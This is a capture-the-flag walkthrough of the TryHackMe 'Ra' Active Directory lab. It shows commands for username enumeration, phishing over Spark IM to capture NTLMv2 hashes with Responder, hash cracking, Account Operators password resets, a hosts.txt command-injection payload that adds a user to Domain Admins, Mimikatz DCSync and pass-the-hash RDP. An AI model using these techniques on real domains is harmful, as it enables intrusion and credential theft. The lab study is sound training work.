TL;DR Walkthrough to the TryHackMe Ra practice VM, including a few things I didn’t see on the linked write-ups.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
I realized I should start these off with some hints:
- There are no AS-REP-roastable or Kerberoastable users
- There is a webserver running on the DC
- If there were hidden pages on the webserver, I didn’t find them
- There are share drives with useful data
- Bear in mind the rights held by the Account Operators group in AD
I’m not the most original out there, so I needed a few hints to get through this one myself. This writeup was really helpful.
On an admin note, much like the last practice VM, I had to restart this one numerous times to get through. Hence the IP keeps changing. All IPs shown are the target. There is one exception regarding Responder.
Scanning & enumeration
As always start out with an nmap scan.
sudo nmap -sV -O 10.10.234.141
We can tell right away that it’s a DC. Hence I visited the website, copy/pasted the last & first names I saw there, and tried enumerating usernames with Mishka’s username generator and Kerbrute. However I wasn’t getting a hit on anything other than Administrator@windcorp.thm, and the guest account was disabled, so enumerating without credentials was out.
As it turns out I was overthinking it. I got a hint from GAMEOFPWNZ’s writeup and realized one can simply do a ‘Save Image As’ on one of the employee pics and learn the username format.
./kerbrute_linux_amd64 userenum -d windcorp.thm --dc 10.10.238.103 ../Wordlists/Brute2.txt
Additionally we know lilyle’s favorite pet’s name.
This means we can simply request a password reset.
Please note that you have to add the target’s IP and both windcorp.thm and fire.windcorp.thm to your /etc/hosts file in Kali for this to work. This will also be important later.
We can now do authenticated enumeration.
enum4linux -u windcorp.thm\\lilyle -p 'ChangeMe#1234' -a 10.10.238.103
crackmapexec smb 10.10.238.103 -u lilyle -p ChangeMe#1234 --shares
There’s the normal SYSVOL & NETLOGON, which didn’t contain anything helpful like plaintext credentials in a script, but there was also Shared and Users.
smbclient \\\\10.10.172.170\\Shared -U Windcorp.thm\\lilyle
This share had the first flag.
more "Flag 1.txt"
It also includes deb, dmg, exe, and tar.gz files for something called ‘Spark 2.8.3’. The webpage that we abused earlier to reset a password has a list of employee names and online status indicators. This must be a hint to install Spark, try messaging them, and see what happens.
I downloaded the *.deb but I couldn’t get it to run. After wasting far too much time I finally realized I could just grab the latest, working copy from here.
sudo dpkg -i spark_2_8_2.deb   # dpkg -i installs a .deb package, not the tar.gz
Then launch Spark and log in with:
- Username: lilyle
- Password: ChangeMe#1234
- Domain: Windcorp.thm
If you get an error regarding the server’s cert then go in Advanced and uncheck the option about checking certs.
There’s only one user online, so search and chat them up.
There are many ways to capture NTLMv2 authentication attempts, from simply running Responder and waiting for someone to fat finger a share name, to MITM6. There are many other really creative ways to elicit an NTLMv2 authentication attempt from Windows described here.
It turns out that Spark IM is another way, as seen above.
Run Responder and phish:
sudo responder -I tun0 -rdwv
Copy/paste the captured NTLMv2 to BuseHash.txt, then:
hashcat -m 5600 BuseHash.txt rockyou.txt --force
We get a hit, and buse has WinRM access.
evil-winrm -i 10.10.244.66 -u buse -p uzunLM+3131
I uploaded PowerUp.ps1, poked around AD a bit, tried Kerberoasting, but didn’t get anywhere. This user can login to a DC, but can’t do much else.
(Get-ADUser $env:USERNAME -Properties *).MemberOf
(Get-ADGroup "IT" -Properties *).MemberOf
This is because they’re nested in the Account Operators AD group. This builtin group can log on locally to DCs by default and can manage all non-protected users & groups. By protected we mean members of the privileged groups (Domain Admins, Administrators, Account Operators itself, and so on) that the SDProp process stamps with the attribute AdminCount = 1. Every 60 minutes SDProp copies the DACL of the AdminSDHolder object onto these users and groups and disables inheritance, so they do not pick up the DACL of whatever OU a careless administrator drops them in. This is to stop a system administrator from shooting themselves in the foot by accident, much like the PowerShell execution policy. It will not stop an attacker from shooting you in the foot on purpose: anything without AdminCount = 1 is fair game for an Account Operator.
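The two MemberOf queries above only show direct membership, so here is an added example (my own code, not from the VM or the original walkthrough) that walks nested membership for the current user, lists the accounts SDProp has marked protected, and checks a candidate target before you spend a reset on it. It assumes the ActiveDirectory RSAT module is available on the box you are shelled into; the target name brittanycr is taken from this walkthrough and is otherwise an arbitrary example.

```powershell
# Added example: map what an Account Operators foothold can actually touch.
# Assumes the ActiveDirectory module (RSAT) is loadable in the WinRM session.
Import-Module ActiveDirectory

# MemberOf is not recursive. Walk group-of-group membership breadth-first so a
# user nested as IT -> Account Operators shows up as an Account Operator.
function Get-NestedGroups {
    param([string]$Identity)
    $seen  = @{}
    $queue = [System.Collections.Queue]::new()
    foreach ($g in (Get-ADUser $Identity -Properties MemberOf).MemberOf) { $queue.Enqueue($g) }
    while ($queue.Count -gt 0) {
        $dn = $queue.Dequeue()
        if ($seen.ContainsKey($dn)) { continue }      # guard against cyclic nesting
        $seen[$dn] = $true
        foreach ($parent in (Get-ADGroup $dn -Properties MemberOf).MemberOf) { $queue.Enqueue($parent) }
    }
    $seen.Keys | ForEach-Object { (Get-ADGroup $_).Name }
}

$groups = Get-NestedGroups -Identity $env:USERNAME
"Effective groups for ${env:USERNAME}:"
$groups | Sort-Object
if ($groups -contains 'Account Operators') {
    "`n$env:USERNAME is an Account Operator (possibly via nesting)."
}

# Accounts SDProp has stamped: AdminSDHolder DACL applied, inheritance off.
# Account Operators cannot modify these; everything else is in scope.
"`nProtected (adminCount=1) users:"
Get-ADUser -LDAPFilter '(adminCount=1)' -Properties adminCount |
    Select-Object -ExpandProperty SamAccountName

# Check a specific target before calling Set-ADAccountPassword.
function Test-AccountOperatorsCanReset {
    param([string]$Target)
    $u = Get-ADUser $Target -Properties adminCount
    return ($u.adminCount -ne 1)
}

$target = 'brittanycr'   # example target from this walkthrough
if (Test-AccountOperatorsCanReset -Target $target) {
    "`n$target is not protected: an Account Operator can reset its password."
} else {
    "`n$target is protected by AdminSDHolder: the reset will be denied."
}
```

A caveat worth knowing when you run this defensively: adminCount=1 can be stale. An account removed from a protected group keeps the attribute and the non-inherited DACL until someone cleans it up, so the list can include accounts that are no longer privileged but are still shielded from Account Operators.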
The VM’s author meant for us to poke around and notice a folder C:\scripts with a checkservers.ps1 file inside. This PS1 pulls values from a text file stored in a user’s folder, does some stuff, and passes the result to Invoke-Expression.
I have said before that I am not sure that anyone other than attackers and malware writers use Invoke-Expression. More accurately they tend to use an obscured version of its alias iex. In this case we are the attacker and we were meant to find this. I am probably preaching to the choir, but Invoke-Expression takes a string as input and runs it as a command.
Escalating to Domain Admin
So how do we abuse this? Simple: use our Account Operators privileges to reset the password of the (non-protected) user whose folder holds the text file, then write our own payload into that file and let the script’s Invoke-Expression run it. It is command injection, just delivered through a file instead of a web parameter.
Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "ChangeASAP00!!" -Force)
Sadly brittanycr does not have WinRM privileges, so we have to create the hosts.txt file (the text file checkservers.ps1 reads) on Kali and then upload it via smbclient. I saved the below in hosts.txt:
; Add-ADGroupMember -Identity "Domain Admins" -Members "buse" ; Add-ADGroupMember -Identity "Administrators" -Members "buse"
Then upload it to brittanycr’s user folder on the DC.
smbclient \\\\10.10.244.66\\Users -U Windcorp.thm\\brittanycr
After that we simply wait a few minutes for the DC’s scheduled task to run the PS1 and our command injection to kick in. I had a couple Kali Terminal tabs open and was still logged in as buse in one tab so I logged out & logged back in via evil-winrm, uploaded Mimikatz.ps1, and dumped just the Administrator’s hash while I was waiting on secretsdump to finish in another tab.
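To make the injection concrete, here is an added example (my own code, not the VM’s actual checkservers.ps1, whose contents I am not reproducing) of the pattern the walkthrough describes: read lines from a file in a user’s folder, build a command string, and hand it to Invoke-Expression. The file path and the use of Test-Connection as the “does some stuff” step are assumptions for illustration; the hardened function beside it shows what the script should have done instead.

```powershell
# Added example: the vulnerable Invoke-Expression pattern beside a safe equivalent.
# Path and the Test-Connection check are assumptions; the real script differs.
$hostsFile = 'C:\Users\brittanycr\hosts.txt'   # assumed location of the trusted input

# --- Vulnerable pattern -------------------------------------------------------
function Test-ServersVulnerable {
    foreach ($line in Get-Content $hostsFile) {
        # The line is interpolated into a string that is then *executed as code*.
        # Given the payload from this writeup the string becomes:
        #   Test-Connection -ComputerName ; Add-ADGroupMember ... -Count 1 -Quiet
        # The leading ';' ends the intended statement; Test-Connection fails to bind
        # its parameter, and the injected Add-ADGroupMember still runs under the
        # identity of the scheduled task (here, something that can edit Domain Admins).
        $cmd = "Test-Connection -ComputerName $line -Count 1 -Quiet"
        Invoke-Expression $cmd
    }
}

# --- Hardened equivalent ------------------------------------------------------
function Test-ServersSafe {
    # Allow only strings that can be hostnames; refuse anything else loudly.
    $hostPattern = '^[A-Za-z0-9][A-Za-z0-9\-\.]{0,253}$'
    foreach ($line in Get-Content $hostsFile) {
        $line = $line.Trim()
        if (-not $line) { continue }
        if ($line -notmatch $hostPattern) {
            Write-Warning "Skipping invalid hostname in ${hostsFile}: '$line'"
            continue
        }
        # The value is passed as a parameter, so it is data and never parsed as code.
        $up = Test-Connection -ComputerName $line -Count 1 -Quiet -ErrorAction SilentlyContinue
        [pscustomobject]@{ Host = $line; Online = [bool]$up }
    }
}

Test-ServersSafe
```

Input validation only closes the injection. The other half of the fix is the trust boundary: a task that runs as a Domain Admin should never read a file that a non-admin (or anyone an Account Operator can become) can write, so move the input somewhere only administrators can modify or run the task as a low-privilege service account.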
evil-winrm -i 10.10.244.66 -u buse -p uzunLM+3131
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'
Of course in the other tab I simply ran:
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc buse:uzunLM+3131@10.10.244.66 >> hashes
This took a while, as there are 4,761 users in windcorp.thm.
While I was waiting on secretsdump to finish it occurred to me that I had not even looked for the second flag. Hence I attempted to RDP as the Administrator and hit the standard buzz kill.
No problem. RDP will only accept an NT hash instead of a password when Restricted Admin mode is enabled on the target, and it is off by default, so we enable it in the registry while logged in via WinRM (DisableRestrictedAdmin = 0 turns the mode on).
evil-winrm -i 10.10.244.66 -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
xfreerdp /v:10.10.244.66 /u:Administrator /pth:bfa4cae19504e0591ef0a523a1936cd4 /dynamic-resolution
Get-ChildItem -Path C:\ -Include flag*.txt -Recurse -ErrorAction SilentlyContinue | Get-Content
I had all the flags before secretsdump finished :)
There are over 4,700 users, 4 or 5 non default OUs, and numerous groups created in the VM’s domain. AD wasn’t really much of a factor in the exercise though, just that Account Operators can control non-administrative accounts. I do give the VM author a lot of credit for including phishing. I believe this is the first CTF type exercise I have seen that did. Overall it was good practice.
4 ways to capture NTLMv2: https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/
More ways to capture NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html
Even more (20 +) ways to capture NTLMv2: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
Handy table of hashcat modes & hash types: https://hashcat.net/wiki/doku.php?id=example_hashes